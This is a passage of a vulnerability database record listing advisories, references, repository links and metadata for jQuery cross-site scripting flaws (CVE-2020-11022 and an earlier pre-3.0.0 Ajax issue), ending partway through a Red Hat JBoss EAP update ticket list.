"https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20230556 - Security Advisory", }, { title: "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20230554 - Security Advisory", }, { title: "Tenable Security Advisories: [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2020-11", }, { title: "Amazon Linux 2: ALAS2-2020-1519", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2&qid=ALAS2-2020-1519", }, { title: "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories&qid=hitachi-sec-2020-130", }, { title: "Tenable Security Advisories: [R1] LCE 6.0.9 Fixes Multiple Third-party Vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2021-10", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231049 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 9", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231045 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 7", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231043 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 8", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231044 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231047 - Security Advisory", }, { title: "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204298 - Security Advisory", }, { title: "Geolocation Playground", trust: 0.1, url: "https://github.com/blaufish/geo ", }, { title: "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES", trust: 0.1, url: "https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022 ", }, { title: "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES", trust: 0.1, url: "https://github.com/korestreet/https-nj.gov---CVE-2020-11022 ", }, { title: "AlmostSignificant", trust: 0.1, url: "https://github.com/bartongroup/AlmostSignificant ", }, { title: "Bagel Patch Website\n\nTO DO:", trust: 0.1, url: "https://github.com/corey-schneider/bagel-shop ", }, { title: "JS_Encoder", trust: 0.1, url: "https://github.com/AssassinUKG/JS_Encoder ", }, { title: "XSSPlayground\nWhat is XSS?", trust: 0.1, url: "https://github.com/AssassinUKG/XSSPlayground ", }, { title: "jQuery XSS", trust: 0.1, url: "https://github.com/EmptyHeart5292/jQuery-XSS ", }, { title: "https://github.com/DanielRuf/snyk-js-jquery-565129", trust: 0.1, url: "https://github.com/DanielRuf/snyk-js-jquery-565129 ", }, { title: "CVE-2020-11022 CVE-2020-11023", trust: 0.1, url: "https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023 ", }, { title: "Strings_Attached\nUser Experience\nDevelopment Process\nTesting\nBugs\nLibraries and Programs Used\nDeployment\nCredits\nAcknowledgements", trust: 0.1, url: "https://github.com/johnrearden/strings_attached ", }, { title: "CVEcrystalyer", trust: 0.1, url: "https://github.com/captcha-n00b/CVEcrystalyer ", }, { title: "CVE Sandbox :: jQuery", trust: 0.1, url: "https://github.com/cve-sandbox/jquery ", }, { title: "jQuery — New Wave JavaScript", trust: 0.1, url: "https://github.com/spurreiter/jquery ", }, { title: "Github Repository Security Alerts", trust: 0.1, url: "https://github.com/elifesciences/github-repo-security-alerts ", }, { title: "Case Study", trust: 0.1, url: "https://github.com/faizhaffizudin/Case-Study-Hamsa ", }, { title: "Retire HTML Parser", trust: 0.1, url: "https://github.com/marksowell/retire-html-parser ", }, { title: "https://github.com/octane23/CASE-STUDY-1", trust: 0.1, url: "https://github.com/octane23/CASE-STUDY-1 ", }, { title: "Awesome-POC", trust: 0.1, url: "https://github.com/ArrestX/--POC ", }, { title: "Normal-POC", trust: 0.1, url: "https://github.com/Miraitowa70/POC-Notes ", }, { title: "Normal-POC", trust: 0.1, url: "https://github.com/Miraitowa70/Pentest-Notes ", }, { title: "Vulnerability", trust: 0.1, url: "https://github.com/tzwlhack/Vulnerability ", }, { title: "Awesome-POC", trust: 0.1, url: "https://github.com/KayCHENvip/vulnerability-poc ", }, { title: "Awesome-POC", trust: 0.1, url: "https://github.com/Threekiii/Awesome-POC ", }, { title: "欢迎关注阿尔法实验室微信公众号", trust: 0.1, url: "https://github.com/alphaSeclab/sec-daily-2020 ", }, { title: "SecBooks\nSecBooks目录", trust: 0.1, url: "https://github.com/SexyBeast233/SecBooks ", }, { title: "PoC in GitHub", trust: 0.1, url: "https://github.com/soosmile/POC ", }, ], sources: [ { db: "VULMON", id: "CVE-2020-11022", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-79", trust: 1.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 1.3, url: "https://www.debian.org/security/2020/dsa-4693", }, { trust: 1.2, url: "https://github.com/jquery/jquery/security/advisories/ghsa-gxr4-xjj5-5px2", }, { trust: 1.2, url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { trust: 1.2, url: "https://www.drupal.org/sa-core-2020-002", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2020-10", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2020-11", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2021-02", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2021-10", }, { trust: 1.2, url: "https://security.gentoo.org/glsa/202007-03", }, { trust: 1.2, url: "http://packetstormsecurity.com/files/162159/jquery-1.2-cross-site-scripting.html", }, { trust: 1.2, url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { trust: 1.2, url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { trust: 1.2, url: "https://jquery.com/upgrade-guide/3.5/", }, { trust: 1.2, url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuapr2021.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { trust: 1.2, url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { trust: 1.2, url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { trust: 1.2, url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { trust: 1.2, url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { trust: 1.1, url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3ccommits.airflow.apache.org%3e", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e", }, { trust: 0.5, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11022", }, { trust: 0.5, url: "https://bugzilla.redhat.com/):", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-11022", }, { trust: 0.4, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11023", }, { trust: 0.4, url: "https://access.redhat.com/security/cve/cve-2020-11023", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14042", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2015-9251", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-8331", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14040", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14042", }, { trust: 0.3, url: "https://access.redhat.com/articles/11258", }, { trust: 0.3, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-11358", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2016-10735", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11358", }, { trust: 0.3, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-9251", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14040", }, { trust: 0.3, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2016-10735", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-8331", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/", }, { trust: 0.2, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.2, url: "https://listman.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.2, url: "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3ccommits.airflow.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/79.html", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:2217", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "https://github.com/blaufish/geo", }, { trust: 0.1, url: "https://www.cisa.gov/uscert/ics/advisories/icsa-22-055-02", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1721", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10146", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10221", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1721", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-15720", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-15720", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10146", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10179", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10179", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10221", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4847", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-40150", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-3143", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2023:0553", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-42003", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-42004", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14041", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40150", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-45047", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-18214", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40152", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40149", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-40149", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-40152", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-14041", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-18214", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-45693", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-46364", }, { trust: 0.1, url: "https://issues.jboss.org/):", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-3143", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12723", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17006", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-20907", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12749", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12401", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12402", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1971", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14866", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-20372", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10878", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20228", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7595", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20843", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20253", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17006", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11719", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-20388", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12401", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17023", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17023", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12749", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-6829", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2021:0778", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-14866", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-8177", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12403", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12400", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-20388", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12723", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-19956", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12243", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10543", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12400", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20191", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11727", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12243", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1971", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11719", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20180", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11727", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-5766", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12403", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-15903", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10878", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20178", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-5766", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-15903", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-20372", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-19956", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17498", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17498", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-20907", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10543", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-35678", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20843", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12402", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1722", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20676", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1722", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20676", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20677", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4670", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20677", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:5249", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7676", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-7743", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-18874", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7720", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-7676", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-7720", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7743", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-18874", }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-04-29T00:00:00", db: "VULHUB", id: "VHN-163559", }, { date: "2020-04-29T00:00:00", db: "VULMON", id: "CVE-2020-11022", }, { date: "2020-11-04T15:29:15", db: "PACKETSTORM", id: "159852", }, { date: "2023-01-31T17:26:38", db: "PACKETSTORM", id: "170823", }, { date: "2021-03-09T16:25:11", db: "PACKETSTORM", id: "161727", }, { date: "2020-11-04T15:32:52", db: "PACKETSTORM", id: "159876", }, { date: "2020-11-30T15:51:22", db: "PACKETSTORM", id: "160274", }, { date: "2020-04-29T22:15:11.903000", db: "NVD", id: "CVE-2020-11022", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2022-07-25T00:00:00", db: "VULHUB", id: "VHN-163559", }, { date: "2023-11-07T00:00:00", db: "VULMON", id: "CVE-2020-11022", }, { date: "2024-11-21T04:56:36.110000", db: "NVD", id: "CVE-2020-11022", }, ], }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat Security Advisory 2020-4847-01", sources: [ { db: "PACKETSTORM", id: "159852", }, ], trust: 0.1, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "code execution, xss", sources: [ { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "160274", }, ], trust: 0.3, }, }
var-201801-0036
Vulnerability from variot
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. jQuery Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. JQuery is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Versions prior to JQuery 3.0.0 are vulnerable. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 